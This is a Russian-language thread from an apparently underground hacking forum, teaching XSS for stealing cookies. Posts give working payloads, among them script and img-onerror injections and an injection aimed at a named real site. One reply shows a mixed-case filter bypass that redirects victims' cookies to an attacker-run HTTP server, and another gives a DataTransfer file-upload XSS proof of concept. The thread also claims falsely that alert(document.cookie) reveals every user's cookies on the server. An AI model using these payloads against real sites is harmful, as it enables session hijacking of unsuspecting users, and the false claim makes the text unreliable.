Интересно XSS, или как получить халявные cookie Ч1.

9779

Original poster
Pro Member
Сообщения
83
Реакции
19
Посетить сайт
XSS, или как получить халявные cookie
1623090620566.png
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:

JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
 
  • Like
Реакции: Admin

AngelXXXanax

Member
Сообщения
5
Реакции
8
Посетить сайт
XSS, или как получить халявные cookie
Посмотреть вложение 5442
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:


JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
photo_2021-06-07_17-16-40.jpg
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
photo_2021-06-07_17-24-08.jpg
 
  • Like
Реакции: Admin и 9779

AngelXXXanax

Member
Сообщения
5
Реакции
8
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
Ещё интересная тема это Reflected XSS via File Upload. На первый взгляд, кажется простой задачей. Но оказывается, что подсунуть пользователю отправку произвольного файла из браузера без действий пользователя не так уж просто. Нам всегда в таком случае надо чтобы пользователь открыл страницу, после из JS создать на странице форму с уже подставленным файлом, и после перенаправить его на уязвимую страницу вместе с загруженными данными. В этом случае ни как не помогут ни XMLHttpRequest, ни fetch, о которых вы сначала могли подумать. Но! Для содержания файлов объект input имеет поле input.files, которое представляет собой объект FileList. И до какого-то времени мы не могли его изменять (он считался immutable) и создавать кастомные FileList объекты, кроме возможности изменять его через объекты полученные из события DataTransferEvent (Т.е. когда юзер сам перетаскивал файлы на экран). Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
JavaScript:
<!DOCTYPE html>
<html>
<body>
 <form id="" action="https://example.com/convert-file" method="POST" enctype="multipart/form-data">
  <input id="file" type="file" name="file"/>
  "/>
 </form>

 <script>
  class _DataTransfer {
    constructor() {
     return new ClipboardEvent("").clipboardData || new DataTransfer();}
  }

  const input = document.querySelector('input');
  const file = new File(['<img onerror="alert(\'Domain: \'+document.domain+\'" src="x" />'],"name.html",{type:"text/html"})

  const dt = new _DataTransfer();

  dt.items.add(file)

  input.files = dt.files;

  document.forms[0].submit();
 </script>
</body>
</html>
 
  • Like
Реакции: Admin и 9779

NothingButAnything

New Member
Сообщения
1
Реакции
0
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
cпасибо, очень интересно
 

9779

Original poster
Pro Member
Сообщения
83
Реакции
19
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
опять ты решил доебаться)))) за штуку с php кстати большое спасибо)) я не знал если честно
 

9779

Original poster
Pro Member
Сообщения
83
Реакции
19
Посетить сайт
Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
Это имба получается)
 
Название темы
Автор Заголовок Раздел Ответы Дата
F XSS - Сборник инструментов Уязвимости и взлом 0
Forevonly Руководство по применению: как обойти XSS-фильтры Полезные статьи 0
klobald Уроки по XSS: Урок 3. Контексты внедрения XSS Уязвимости и взлом 0
klobald Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
klobald Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
Forevonly Skipfish - Сканер безопасности веб-приложений для определения XSS, SQL инъекции, а также Shell инъекции Kali Linux 0
X нашел xss , что делать дальше? Вопросы и интересы 0
Admin XSS атаки с помощью Referer'а Уязвимости и взлом 0
ins1der Инжектим скрипт beef используя XSS Полезные статьи 4
Admin Приключения xss векторов в необычных местах Уязвимости и взлом 0
pw0ned Golden-Bird.biz XSS Другое 4
Admin Cyber Industries - Активная XSS Уязвимости и взлом 0
Admin Выжимаем максимум пользы от XSS Уязвимости и взлом 1
Admin Hotmail - xss Уязвимости и взлом 0
Admin Mail ru - xss Уязвимости и взлом 1
M Куплю Куплю или залью симкарты Тинькофф Мобайл. Куплю/Обменяю 0
S Коронавирус - реальная угроза или манипуляции? Свободное общение и флейм 4
mickey7091 Даю разовые или постоянные работы отрисовщикам(общий бюджет 500 долларов-смотрите видео доказательство). Предоставляю работу. Ищу специалиста. 4
slovokek Куплю Скуплю или отработаю логи БА ЮСА! Куплю/Обменяю 0
slovokek ищу трафферов фб или гугл Предоставляю работу. Ищу специалиста. 0
Config Куплю Реализую ваши аккаунты с почтой у себя в интернет магазине. Гарантия ~10 дней или верну аккаунт Куплю/Обменяю 0
Р Интересно Способ вывода с Binance и других бирж без верификации по СМС или 2FA Способы заработка 0
S Услуги Хакера Заказать Whatsapp,Viber,Telegram,Vk Связь с нами - [email protected] Всем Добрый день Интересует услуга взлома вашего Врага или же Корзина 0
AngelXXXanax Солевой генний или как пройти CTF Odin: 1 Полезные статьи 1
I Emacs VM или termux для программирования Свободное общение и флейм 0
9779 Интересно MST-или деанон через ссылку. Полезные статьи 7
abc11 Куплю Куплю dating отклик и базы email adult или dating направленности Куплю/Обменяю 1
S Дурак или Умный. Кому жить проще? Свободное общение и флейм 4
V Андрей Комбат «Начало пути или заработай в сети» 2.0 Способы заработка 2
Aleksandr Log Куплю Куплю свои запросы в ваших новых и/или отработанных USA логах Куплю/Обменяю 1
Ricardo Milos Продам Пластиковые карты Qiwi | ЮMoney, отправка СДЭК или фото пластика Финансы - биллинги, банки, кошельки, логи 0
H SMM за 100.000 или как получить пассивный доход (2021) Способы заработка 0
Р Интересно 1000 рублей на Delivery Club HONOR 10X Lite или HUAWEI P smart Способы заработка 0
B Купить или продать биткоин за рубли без регистрации Berukriptu.ru Обменники 0
st.ap Подскажите курсы или уроки по вирусописанию Вопросы и интересы 2
Ghozt ToxMod или история о том как за катку никто не трогал твою мать. Новости в сети 14
U 500 рублей за 15 минут нужны права или загран Корзина 0
Aleksandr Log Куплю Куплю свои запросы в ваших новых и/или отработанных USA логах (доступы к корп сетям). Куплю/Обменяю 0
M Куплю или отработаю БА DE Куплю/Обменяю 3
CMDfromBAT Интересно КАВЕР НА ГОРОД ПОД ПОДОШВОЙ или КОНКУРС НА ЛУЧШИЙ РЭП ПРО ИБ Свободное общение и флейм 6
CMDfromBAT Интересно НЕВИДИМЫЙ IP-LOGGER В СТАТЬЕ TELEGRAPH или ДЕАНОН LVL. 120 Уязвимости и взлом 16
T Поиск сценариев или вредоносного ПО для кражи биткойнов Продажа софта 2
Eteriass Интересно Боксерская груша хакеров или что такое metasploitable Полезные статьи 1
Anorali Интересно Как поймать хацкера за попу или написание своего honeypot'а Полезные статьи 3
3 Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на почту Корзина 0
X Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на поч Ищу работу. Предлагаю свои услуги. 1
Jony14 Интересно Взлом компьютера через беспроводную мышь или клавиатуру Уязвимости и взлом 2
K Нужен дроп или дроповод в Грузии Предоставляю работу. Ищу специалиста. 0
Terezamain Скопирую любой лохотрон или лендинг бесплатно или за символическую плату Другое 0
_ZerO_ Интересно Python и LongPoll VK, или как запустить скрипт ВК и настроит Другие ЯП 2

Название темы